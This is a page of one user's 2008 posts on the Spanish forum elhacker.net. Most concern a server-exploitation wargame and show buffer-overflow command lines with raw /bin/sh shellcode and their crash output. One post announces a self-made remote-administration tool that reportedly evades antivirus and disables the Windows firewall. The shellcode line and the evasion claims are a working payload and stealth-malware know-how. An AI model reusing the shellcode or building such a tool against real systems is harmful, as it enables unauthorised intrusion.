elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Mensajes
Páginas: 1 ... 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 [420] 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 ... 456
4191  Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores en: 1 Diciembre 2008, 01:57 am
Nop no carga, ayer el servidor real del warzone también estaba off y como se veia la shell funcionando ps lo mas probable es que alguien esté lanzando algún ataque ddos.
Si es así lo mas probable también es que no tenga ni la mas minima idea de como entrar y por frustración la gente se desespera y comienza a hacer tonterías para sentirse tomados en cuenta.

(sugerencia) Sdc, podrías poner la web en un servidor ajeno a la shell y en ves de entrar que te de la ip del servidor con la shell real y asi evitas que un ataque al pedo proboque que no podamos entrar
4192  Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores en: 30 Noviembre 2008, 02:35 am
Si, no se ve pero la shell anda impecable porque no está dentro del servidor del wargame.

http://shell.wargame.elhacker.net/
4193  Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores en: 30 Noviembre 2008, 02:01 am
Ya, me aburrí, mañana será otro dia  :P

Citar
./BoF `perl -e 'print "?" x 998'``../xxx/shellcode`
./BoF `perl -e 'print "?" x 1036'``../xxx/shellcode`

Citar
Segmentation fault

Probé del 990 al 1070 para ver si me habia equibocado en el tamaño de la shellcode pero nada. y pruebo la shellcode y me lanza la shell pero al bolcar el buffer sobre el BoF no funciona. Para eso tube que modificar de la ejecución a printf guiandome por goodfellas (http://goodfellas.shellcode.com.ar/bsd.html).

Citar
$ ./BoF `perl -e 'print "?" x 1035'``../xxx/shellcode`
Mas facil no se puede xD
Usted paso como parametro lo siguiente:
...
Segmentation fault
$

Tampoco ..

Citar
./BoF `perl -e 'print "?" x 1056 . "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh";'`
Mas facil no se puede xD
Usted paso como parametro lo siguiente:
...
Segmentation fault
$
[/quote]

Tampoco, shaaaaaa  :rolleyes:

Citar
???????????????????????????????????????Ù↨[1└êCëëC♀PìRS░;P═ÇÞõ   /bin/sh
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
chown: not found
chown: not found
Mas facil no se puede xD
Usted paso como parametro lo siguiente:

¾Ý┐┐☺¯┐┐↕¯┐┐&¯┐┐N¯┐┐V¯┐┐c¯┐┐ǯ┐┐ø¯┐┐ª¯┐┐▓¯┐┐┐¯┐┐╦¯┐┐ί┐┐>´┐┐J´┐┐P´┐┐_´┐┐n´┐┐Ç´┐┐
ò´┐┐ª´┐┐
Segmentation fault
$
4194  Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores en: 30 Noviembre 2008, 00:12 am
Citar
$FreeBSD: src/lib/csu/i386-elf/crti.S,v 1.7 2005/05/19 07:31:06 dfr Exp $  Adv
ertencia "/usr/home/warzone/validar"
Solo puede ser ejecutado 10 veces por Usted
Esta vez no cuenta solo le informa el uso:
        Debera ejecutarlo usando path absoluto o relativo
        da igual esto es asu gusto.
Se le pedira el hash del reto N, donde N el ultimo reto que ha Ejecutado
Esto es por seguridad y para evitar un ForceBrute.
Note que cada vez que ejecute los programas vulnerables se va
a generar un Hash Aleatorio

        Saludos y Suerte.

Anon.
 /usr/home/warzone/.db/count_ /usr/home/warzone/.db/reto_ %s%d r+ %s w fopen():
%s r    Usted no a ejecutado ningun Reto!
No cuenta esta ejecucion Ejecutado: %d
 Hash de la Prueba %d:  Perfecto ;)    /usr/home/warzone/.db/grupos %d %d %d No
es Igual!! ;(  Lo sentimos ya ha sobrepaso el limite de Ejecuciones!!
 Guadar calloc(): %s $FreeBSD: src/lib/csu/i386-elf/crtn.S,v 1.6 2005/05/19 07:3
   \♦   $♣   á♠   Óü♦ ¶á┤î    ☺   §   ♀   îà♦

Como es que puedo ejecutarlo solo 10 veces si cuando lo ejecuto me da errores
Citar
sh ./validar
‼4: not found
⌂ELF☺☺☺: not found
./validar: 4: Syntax error: "(" unexpected (expecting ")")

No sabía que solo se podía ejecutar 10 veces :-s talves ya la jodí jajaja o talves se ejecute bién cuando logre pasar la primera parte no se pero bueno.

PD: Olvidalo ya se que pasó y estoy viendo lo de la shellcode.
4195  Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores en: 29 Noviembre 2008, 21:14 pm
Ya entré.

Citar
Mas facil no se puede xD
    Se esperaban Parametros!!
Uso:
        %s <algo>
  Usted paso como parametro lo siguiente:

%s
 calloc(): %s

Esto me recuerda y si es que no me equivoco debe ser el mismo, la prueba que hicieron hace tiempo en la sección de wargames donde alguien prestó su servidor con el mismo sistema donde estamos ahora y al parecer con el mismo programa y con la misma falla  :P solo que la shell no es una shell sino que es un pipe a quien sabe donde.

De todas formas intenté:
Citar
sh ./validar `perl -e 'print "?" x 1036'`
aunque en checker y BoF me dió lo mismo: nada.

No soy tan bueno para los bof como berz3k :P

PD: hacen mas de 30 grados de calor y me duele la cabeza a mares :-\
PD2: Busqué en los post anteriores del foro de wargames hasta la última página y ya no está  :huh: supongo que no lo movieron/borraron apropósito vdd?
4196  Seguridad Informática / WarZone / Re: Torneo de explotacion de servidores en: 29 Noviembre 2008, 08:55 am
Citar
ya lo viiiiii!!  es windowssssssssssssssssssssssssssssssssssssssssss
aunque dudo que logren encontrar como iniciar sesion mas del 10%

Yo pensaba que era bsd pero bueno, supongo que verificar los puertos tampoco hace daño no? el netcat me arrojó todos los puertos abiertos XD asi que tube que usar el nmap mejor y no encontré nada jajajaja no voy a decir como intenté entrar para que lo intenten también los demás  :P pero de todas las maneras que traté no pude.

Supongo que esto va de buena forma y no de mala verdad? por algo dieron user y pass, supongo que de entrada no hay que explotar nada como la falla de los win server o un rpcdcom  :rolleyes:.

Si la falla no va a nivel web supongo que la vulnerabilidad del php que tiene no tiene nada que ver  :P

Que rabia, con las ganas que tenía de entrar, suponiendo que es win sería mas fácil.
4197  Programación / PHP / Re: [Proyecto] El Maletín (Fuente) en: 18 Noviembre 2008, 22:37 pm
Código actualizado que repara el bug de la variable [-info] al no detectar valores en sistemas virtualizados.

estuve pensando seriamente que al cambiar el idioma de las respuestas que da la consola de comandos puede dar un valor erroneo al intentar capturarlo, voy a tener que hacerlo de una forma diferente detectando cada array de respuesta.

Hola IngAmc  ;D
4198  Programación / PHP / [Proyecto] El Maletín (Fuente) en: 17 Noviembre 2008, 21:34 pm
El maletín 1.2 Beta

Bueno, este no es un script para una web, sino la fuente para un archivo binario ejecutable para Win32.

Ahora ustedes dirán:
Citar
:o de php a exe??
Así es, con el BamCompiler.

De que se trata?... Es un software de administración remota donde la idea es que contenga todas las herramientas mas simples y necesarias para la buena y cómoda administración de una shell remota.

Expongo acá su código fuente para ver si me pueden apoyar en algunas lineas y dar ideas, etc.

Si alguien quiere ofrecerse de BetaTester pueden hacerlo en el subforo de "Análisis de malware".

La idea principal de este software es poder hacer pruebas localmente o remotamente pidiendoles la cooperación de la persona involucrada tal como se los estoy pidiendo yo, en ningún caso debe utilizarse para administrar un sistema que no sea de nuestra propiedad o sin el concentimiento de su dueño. Esto es para evitar problemas legales y poder comprender como protegernos ante ataques remotos sin la necesidad de presindir por el antivirus ya que hasta la fecha no es detectado por ningún sistema antimalware ni antivirus a exepción ovbiamente de los Firewalls, aunque con unas pequeñas funciones pueden deshabilitarse tal como lo programé para el firewall de Windows XP y Vista.

Descargar Fuente

Como pueden ver muchas de las funciones están sin crear ya que en php no hay Handle que puedas utilizar para alguna función, por lo cual me veo casi obligado a utilizar softwares externos como por ejemplo "REG" y "wmic".

Binario y Pruebas con el binario en este subforo:
http://foro.elhacker.net/analisis_y_diseno_de_malware/proyecto_el_maletin-t234529.0.html
4199  Seguridad Informática / Desafíos - Wargames / Re: Eres un Hacker? PRUEBALO CON ESTE TEST!!!!!! en: 16 Noviembre 2008, 18:04 pm
ya voy en la 8

Citar
<!-- YOU'RE LOOKING IN THE WRONG PLACE... GO BACK! -->
:¬¬

Editado
En la 9.
Reeditado :P
En la 10
Citar
Warning: Cannot modify header information - headers already sent by (output started at /home/hackert/public_html/gazebruh.php:11) in /home/hackert/public_html/gazebruh.php on line 58
Rereeditado
Vaya nombre del php del nivel 13  :P eso en mi pais tiene un significado.

rerererereditado  :xD
Citar
Congratulations! You have passed to level 10. Here, things become much more difficult ;-) Hope you get through! Enjoy.
ya lo terminé, de seguro el nivel 21 es este: http://www.hackertest.net:2082/login/
4200  Seguridad Informática / Seguridad / Re: Nueva encuesta: Mejor Firewall en: 11 Noviembre 2008, 01:17 am
Citar
Windows Firewall XP SP2     - 47 (7.7%)
:xD jaja que risa, recuerdo que alguien una ves me dijo por msn que el firewall de windows era el mejor que existía hasta que le mostré como deshabilitarlo con un solo comando  :P.

No pusieron los mejores firewalls que existen APF, Iptables, AtGuard, Black Ice el que le hace la cruz publicamente a Nmap, al comienzo solo para linux pero ahora también para win32. De todas maneras voté por el zone alarm  :P
Páginas: 1 ... 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 [420] 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 ... 456
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines